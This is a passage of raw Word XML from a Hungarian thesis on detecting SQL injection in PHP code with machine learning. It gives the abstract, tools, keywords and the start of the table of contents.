    <w:p w14:paraId="246CC038" w14:textId="6677EA0D" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="000D6476" w:rsidP="00C96E17">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SQL injection detektálás természetes nyelvi feldolgozó rendszerek és gépi tanulás által</w:t>
      </w:r>
      <w:r w:rsidR="001E547F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16E84D"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megadott feladat megfogalmazása:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59361A3D" w14:textId="29D7A426" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00C65A6F" w:rsidP="005F2E18">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Minták </w:t>
      </w:r>
      <w:r w:rsidR="00DC7B94" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>által</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanított program képes reális becslést adni </w:t>
      </w:r>
      <w:r w:rsidR="00887ABC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy kód SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="007A765E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">beli </w:t>
      </w:r>
      <w:r w:rsidR="00887ABC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sebezhetőségével kapcsolatban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B998C7A"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megoldási mód:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B686EEB" w14:textId="73318A10" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00C84C9F" w:rsidP="00C6471D">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP kódokból generálok absztrakt szintaxis fákat, amelyeket felcímkézek, mint sérülékeny és nem sérülékeny példák. Ezek átesnek egy vektorizáláson, majd </w:t>
      </w:r>
      <w:r w:rsidR="00831BF3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy </w:t>
      </w:r>
      <w:r w:rsidR="005B7A75" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kifejezett modell segítségével </w:t>
      </w:r>
      <w:r w:rsidR="00C6471D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>– amely a legkevesebb hibás döntéseket hozza - a program megtanulja felismerni a sérülékenység jeleit. E</w:t>
      </w:r>
      <w:r w:rsidR="00C227D9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nnek hatására</w:t>
      </w:r>
      <w:r w:rsidR="00C6471D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> egy nem tanuló kódról képes kiértékelést készíteni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36CA6B" w14:textId="040B769D" w:rsidR="009379EF" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="009379EF">
      <w:pPr>
        <w:pStyle w:val="dto2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Alkalmazott eszközök, módszerek:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19D7B3" w14:textId="45C1E0CA" w:rsidR="001A25FC" w:rsidRPr="00D47FAE" w:rsidRDefault="00211315" w:rsidP="00A35CB6">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="001836DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Visual Studio Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
      </w:r>
      <w:r w:rsidR="00605DFC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidR="00A35CB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">mellett a gépi tanulás során Python, </w:t>
      </w:r>
      <w:r w:rsidR="00CB720D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B94677">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="00EB4080" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">asztali </w:t>
      </w:r>
      <w:r w:rsidR="007317BD">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>alkalmazás</w:t>
      </w:r>
      <w:r w:rsidR="00CB720D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> megvalósításához</w:t>
      </w:r>
      <w:r w:rsidR="00A35CB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">back-end-en </w:t>
      </w:r>
      <w:r w:rsidR="00CB720D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>programozási nyelvet</w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, f</w:t>
      </w:r>
      <w:r w:rsidR="00951CF0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nt-end-en FXML leíró</w:t>
      </w:r>
      <w:r w:rsidR="00A35CB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C5CEA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">nyelvek </w:t>
      </w:r>
      <w:r w:rsidR="00AE1554" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>alkalmaztam.</w:t>
      </w:r>
      <w:r w:rsidR="00EB4080" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E37842">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Verziókövetésre a GitHub</w:t>
      </w:r>
      <w:r w:rsidR="00C0799F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendszert használtam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A592B"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Elért eredmények:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F65777" w14:textId="7C402364" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00717427" w:rsidP="002455B0">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A program </w:t>
      </w:r>
      <w:r w:rsidR="0059119E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>felhasználói</w:t>
      </w:r>
      <w:r w:rsidR="00D20F47">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> felületen </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a bemenetként megadott PHP kódra</w:t>
      </w:r>
      <w:r w:rsidR="00E02F9C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F8513E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kimenetként</w:t>
      </w:r>
      <w:r w:rsidR="002455B0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D50F82">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny</w:t>
      </w:r>
      <w:r w:rsidR="0023179E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086431A"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Kulcsszavak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E66206" w14:textId="7B33AD32" w:rsidR="00DB7231" w:rsidRPr="00D47FAE" w:rsidRDefault="00AA73E1" w:rsidP="00BB0406">
      <w:pPr>
        <w:pStyle w:val="dto2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00DB7231" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>elügyelt tanulás</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB0406" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> train/test készlet,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB7231" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>K-Fold</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BB0406" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>onfusion m</w:t>
      </w:r>
      <w:r w:rsidR="00595FDA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">trix, </w:t>
      </w:r>
      <w:r w:rsidR="00BB0406" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ecal</w:t>
      </w:r>
      <w:r w:rsidR="00BB0406" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="005F2E18" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0BB92" w14:textId="77777777" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="00A62937">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:id w:val="1142616211"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="47888ABE" w14:textId="77777777" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="00A62937">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7888CF7D" w14:textId="70A00FBC" w:rsidR="00B55F7D" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="002B6A5A">
          <w:pPr>
            <w:pStyle w:val="Cmsor2"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:id="4" w:name="_Toc71471960"/>
          <w:r w:rsidRPr="00D47FAE">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <w:t>Tartalomjegyzék</w:t>
          </w:r>
          <w:bookmarkEnd w:id="4"/>
        </w:p>
        <w:p w14:paraId="43655D1C" w14:textId="39EE64B7" w:rsidR="009960B3" w:rsidRPr="00D47FAE" w:rsidRDefault="009960B3" w:rsidP="00A62937">
          <w:pPr>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1AF1CD16" w14:textId="385815C3" w:rsidR="00AA5B4A" w:rsidRDefault="00B55F7D" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D47FAE">
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00D47FAE">
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00D47FAE">
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc71471958" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Feladatkiírás</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471958 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49559072" w14:textId="7E62F824" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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59" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Tartalmi összefoglaló</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471959 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72933BE1" w14:textId="7DF622E7" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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60" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Tartalomjegyzék</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471960 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="156D181C" w14:textId="08B3A902" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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61" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>BEVEZETÉS</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471961 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="154296E8" w14:textId="6E5FD984" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471962" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
